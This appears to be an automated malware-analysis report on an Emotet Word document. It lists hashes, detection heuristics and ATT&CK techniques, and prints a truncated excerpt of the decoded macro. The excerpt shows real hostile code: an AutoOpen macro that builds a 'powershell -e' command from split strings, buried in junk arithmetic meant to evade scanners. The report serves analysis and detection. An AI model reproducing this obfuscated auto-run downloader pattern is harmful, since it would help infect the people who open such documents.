Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 8c77b90bcec1ccfd…

MALICIOUS

Office (OLE)

Size: 196.8 KB
Created: 2019-03-13 20:41:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: b1b4386e85a2b3942bce1609246cde42
SHA-1: 5d3c552290442e9f0aee95676631eed253008e71
SHA-256: 8c77b90bcec1ccfdca3f73dcc1835ec0b99a6bc07abdd01a89ad8d8274e92db1
Risk score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that uses GetObject to execute code. Heuristics indicate obfuscation techniques and a detection by ClamAV points to the Emotet family. The macro likely attempts to download and execute a second-stage payload, as suggested by the 'Doc.Downloader' classification and the obfuscated API calls.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-6894403-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6894403-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 39457 bytes
SHA-256: dd41194aa5f4077288c89a700e497d30fc2a07104fa219e4978951226d7d0716
First 1,000 lines of the extracted script
Attribute VB_Name = "oB4ZA1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function pDx1cA()
   If iAABB4A = OkAAwU Then
RAxAA1 = CVar(mZAAG4w)
mQAcwQA = bBwoCGAA + CInt(pXBQZU) * 85634570 * CBool(110029696) + 473696187 / Round(iAAA_Bc) - GAUBAB + Sqr(222054324) - 867853187 * CByte(540683069)
nDCBAoQ = CInt(HG1k4oG)
End If
   If KwAQxowG = oX_AAZD Then
Gk1DUAC = CVar(SU_11A)
IB1ACkAo = mG44AA_ + CInt(vBXADBX) * 323806196 * CBool(809013985) + 49850415 / Round(BZADQUAX) - a4AXAUQ + Sqr(811770819) - 666774248 * CByte(817220195)
QBCUwGAA = CInt(fGUAcwDD)
End If
   If wG4ZUAU = pDUAAAA Then
r_CZAD = CVar(dwUXcCQo)
mACABAAA = fAoAoU + CInt(WAUQxAB) * 172565119 * CBool(287150274) + 350561176 / Round(jxUZAk) - wUDAwwD + Sqr(942833722) - 339619269 * CByte(962990992)
IAAZUXw = CInt(TCDAUAB)
End If
   If sAAoxD = K1XoQAAD Then
l_wZ1_cD = CVar(mXQAGA)
fkGQGkwk = sAAGAkAB + CInt(HAoAAQA) * 15975504 * CBool(531060489) + 877328831 / Round(lA_AXCQ) - HDAw1U + Sqr(66528832) - 916906444 * CByte(660349447)
LDBQAQAA = CInt(fZ_AAx)
End If
   If uA_AAQ = FUkwAxkk Then
RUAACA = CVar(sBDDAABB)
UAA1AB = fDAxAAo1 + CInt(tckAocAA) * 624049252 * CBool(740707161) + 126712660 / Round(EACAAwA) - vAXwABA_ + Sqr(490533071) - 988227383 * CByte(121387903)
VDAxCDQC = CInt(nUDU_Ak)
End If
   If RAAXcAG = towUBAo Then
SCDUD4wA = CVar(PAkCD4)
uxAw4GZ = K14AAc + CInt(uACAAc) * 550719061 * CBool(102685227) + 686738258 / Round(nCAkA_) - SkAUoXZ + Sqr(15235627) - 143825224 * CByte(426434539)
S4oXQD = CInt(CQkCD1)
End If
End Function
Sub autoopen()
On Error Resume Next
   If Ew1QB4DA = MAAAAUAA Then
aQABAAD = CVar(i4AxAABG)
tCQABZ = t1wAACAD + CInt(l4AZX4X) * 239025156 * CBool(814371340) + 107700611 / Round(NxAooUA) - FZcwA_ + Sqr(271706513) - 949110291 * CByte(464693885)
EwCDXDQ = CInt(fGBGAA)
End If
   If QoA1ooA = vXABxow Then
ZU1XoUAQ = CVar(GAZAC_)
SwDACBA = w_xocAA + CInt(FkcDGkQA) * 961388465 * CBool(211819448) + 425441850 / Round(SA1oxZG) - PUAU1DX + Sqr(140326894) - 204412231 * CByte(64249682)
TA4AQA = CInt(tUDDADQ4)
End If
HA4DUckB (DA4A1ADB + "po" + HA1DkA + "wersh" + DAGQAQ + "ell -e " + z1CBAUX + oCAcDA_A + WxAxkQ + mAQAAAk + fAAUcww + CZGABUZ + LXAUCA)
   If NxAAGU = vXBAcQBA Then
WQAQA_B = CVar(j1cDAQ)
Q1AA1c = VGABXD + CInt(MBUAUU) * 863341590 * CBool(692255187) + 361060324 / Round(iAk4DCAQ) - zAQAwwA + Sqr(136296685) - 751573616 * CByte(904331075)
wBAAGUAA = CInt(AAAU1D)
End If
   If DB4AUDAw = nGcDAAk Then
ZZADADA = CVar(EAoAGDA_)
WAw4A_U = PwXBxA + CInt(RA1QQD) * 794354315 * CBool(153381967) + 854805939 / Round(AAACoA) - OADAAUU + Sqr(426838703) - 606858628 * CByte(911304945)
wCk_UoUA = CInt(WQAUC4A)
End If
End Sub
Function rwU1GBZ_()
   If aXAXxoC = XZk1GGB Then
wABAUA_U = CVar(RAQCAAAA)
lUUACAA1 = a1B1oAc + CInt(vUAXCQAC) * 559030425 * CBool(717670101) + 383986425 / Round(IQwQDAG) - IAAZAc + Sqr(228355177) - 49871985 * CByte(151499445)
TZXUXA = CInt(tUBcxx)
End If
   If Z_AADQU = FDBBAxQk Then
tBXBDXw = CVar(KcA1ZxXw)
GAAACw = kXBxXcX + CInt(P4oDkXA) * 236897631 * CBool(932283284) + 938090515 / Round(iAAAxAA) - L4GAQUU + Sqr(207679541) - 762086332 * CByte(171389276)
Zo4Zxx = CInt(Kx1AAkC)
End If
   If McxDG_4 = ucBAQAA Then
wAAUAA = CVar(dkBAU4)
vUXZDUx = PxAD4UGG + CInt(W4BBkAUA) * 477490932 * CBool(386608422) + 847336800 / Round(FQADkUo) - KAoAxA + Sqr(949147911) - 741588950 * CByte(892681466)
ixQAoDQC = CInt(QAAAwAc)
End If
   If DZGA1AQ = zCUc1ABU Then
TAAABAB = CVar(YoAAxB)
KZAUBAcC = rZGUAA + CInt(jADD1UX_) * 43975110 * CBool(25963438) + 623421220 / Round(Wo1AoAQ) - Rw_UAwU + Sqr(90302746) - 88167287 * CByte(180590265)
tAZkXA = CInt(OcAAGU4)
End If
   If dAD_ACA = QDBAADA_ Then
H4ACxB = CVar(WXcAUoU)
aAADAwQ = VDAQxUo + CInt(uAcD4o_) * 886672414 * CBool(186588826) + 791281279 / Round(wAoAAQAA) - o4G__BA + Sqr(159850927) - 573576171 * CByte(754796977)
ZkGAAXo 
... (truncated)